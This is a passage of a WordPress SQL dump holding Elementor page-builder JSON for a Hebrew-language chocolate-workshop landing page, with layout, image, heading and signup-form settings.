successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(344,86,'_elementor_version','0.4'),(345,86,'_elementor_template_type','post'),(347,87,'_wp_page_template','elementor_canvas'),(348,87,'_elementor_edit_mode','builder'),(349,87,'_elementor_template_type','post'),(350,87,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 